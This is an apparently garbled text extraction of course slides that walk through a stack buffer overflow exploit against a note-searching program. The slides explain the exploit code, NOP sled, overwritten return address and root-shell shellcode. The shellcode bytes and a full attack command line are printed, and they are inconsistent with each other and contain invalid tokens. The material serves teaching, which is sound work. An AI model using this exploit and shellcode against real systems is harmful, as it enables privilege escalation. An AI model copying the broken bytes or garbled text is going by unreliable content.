buffer overflow walk-through
DESCRIPTION
Buffer Overflow Walk-Through. The Code. Change name of notesearch program in our exploit code to match course naming convention. strcpy (command, “./bettersearchnote.exe\’”);. b ettersearchnote.exe. 16. - PowerPoint PPT PresentationTRANSCRIPT
Buffer Overflow Walk-Through
The Code
Change name of notesearch program in our exploit code to match course naming
convention
strcpy(command, “./bettersearchnote.exe\’”);
bettersearchnote.exe
16
Change name of notesearch program in our exploit code to match course name in
convention
Normally, Jose runs bettersearchnote program to search for notes with keywords
of his choosing
jose@EC310-VM $ ./ bettersearchnote.exe “Life”Life is Beautiful
The exploit program is crafted to run the program on his behalf, using the function
“system()”
jose@EC310-VM $ lsunix_basics booksrc work desktop ec310code
For example system(“ls”) would list the content of the current directory as though it was run from the command line
} like this except no one ever enters this at the command prompt
The exploit program is crafted to run the program on his behalf, using the function
“system()”
jose@EC310-VM $ ./system_example.exeunix_basics booksrc work desktop ec310code
#include…int main() {
system(“ls”);
}
system_example.c
Now, lets look at what the exploit program does…Standard
inclusion of C libraries
The goal of our exploit program is to open a root shell
This is machine language that opens a shell prompt for the user running the program
First, the set-up…
This is the standard way to start a program and take in command line arguments… But you already knew that
iptrretoffset 270commandbuffer
Building the stack…
These lines declare the variables to be used in the program
Variables are placed on the stack for the main function
IntegerAddressIntegerIntegerAddressAddress
Allocating memory on the heap for our string command, which will be called by the function
system() .
Allocates 200 bytes on the heap for the string command
200 Bytes
iptrretoffset 270
command &commandbuffer
The address of this location on the heap becomes the value of the pointercommand
0x__
This string will eventually be run with the function system()
00 00 00 00 00 00 00 00
00 00 00 0000 00 00 00
00 00 00 00 00 00 00 0000 00 00 0000 00 00 00
Allocating memory on the heap for our string command, which will be called by the
function system().The bzero function places 200 0x00’s starting at the location to which command points
200 Bytes
iptrretoffset 270command &command
buffer
. / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 0000 00 00 00
00 00 00 00 00 00 00 0000 00 00 0000 00 00 00
Building the String command
This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointercommand
iptrretoffset 270command &commandbuffer
This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell
. / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00
Next we need to find the address where the command line arguments for bettersearchnote will start!
24
Take the number of bytes in the current string command, until the null terminator (24 bytes). Add this to the address pointed to by the variable command and store that address in the pointer buffer.
&command
+
iptrretoffset 270command &commandbuffer
Bytes
. / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00
Specifying our custom return address
This takes the command line argument to create our own custom offset value, but it is not used.
iptrretoffset 270command &commandbuffer &command+24
. / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00
command &commandoffset 270
, this value represents the address of our desired shell code execution entry point.
Specifying our custom return address
This takes the address of iand subtracts the value of offset.This value is placed in the variable ret
&i
- 270
iptrret
buffer &command+24
. / b e t t e r s e a r c h n o t e . e x e . ‘ 00 00 00 00 00 00 00 00 00 00 00 00
And place enough copies of our custom return address in the buffer to overwrite the original return
address.
Takes the address contained in ret and places it in the address pointed to by the buffer.
This repeats every 4 bytes for 40 iterations.
iptr
offset 270command &command
&i - 270&i - 270&i - 270ret &i-270
buffer &command+24
Now the entire heap looks like this
. / b et t e rs e a rc h n ot e . ex e '
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
0x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
. / b e t t e r s e a r c h n o t e . e x e . ‘
&I - 270&I - 270&i - 270
ret 0x I – addr - 270&i - 270&i - 270&i - 270&i - 270&i - 270
0x90
Next create a buffer of filler commands, called NOPs, to help find the shell code
memset() sets a byte in memory to the value specified.In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well.
0x90 is machine code for “No Operation,” Which literally means do nothing.
0x900x900x90
command &commandoffset 270
iptrret &i-270
buffer &command+24
0x900x900x900x90
Now the entire heap looks like this
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
0x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
NOP sled
Copies the shell code into memory after the NOP sled
. / b e t t e r s e a r c h n o t e . e x e . ‘ 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90
ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270ret 0x I – addr - 270
Then place our shell code into the buffer immediately following the NOPs
command &commandoffset 270
iptrret &i-270
buffer &command+24
Now the entire heap looks like this
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
0x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
With the newly inserted shell code here
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
0x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
' 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
Concatenates a single quote at the end of the stringcommand
Close the string command with a quote so it is ready to be run by the function system()
‘
Now the string command is finished and ready for execution.
jose@EC310-VM $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
‘ 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
‘ 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00
exploit_notesearch
searchstring
fd printing
user id sfp
return address
bettersearchnote.exe
100 characters allotted to searchstring by bettersearchnote.exe
exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space.
Ensuring one of our custom return addresses replaces the original return address
. / b et t e rs e a rc h n ot e . ex e '
0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x900x31 0xc0 0x31 0xc90x99 0xb0 0xa4 0xcd0x80 0x6a 0x0b 0x580x51 0x51 0x68 0x2f0x2f 0x73 0x68 0x680x2f 0x62 0x69 0x6e0x89 0xe3 0x51 0x890xe2 0x53 0x89 0xe10xcd 0x80 0x80 partial ret
&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270&i-270
‘ 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x000x00 0x00 0x00 0x00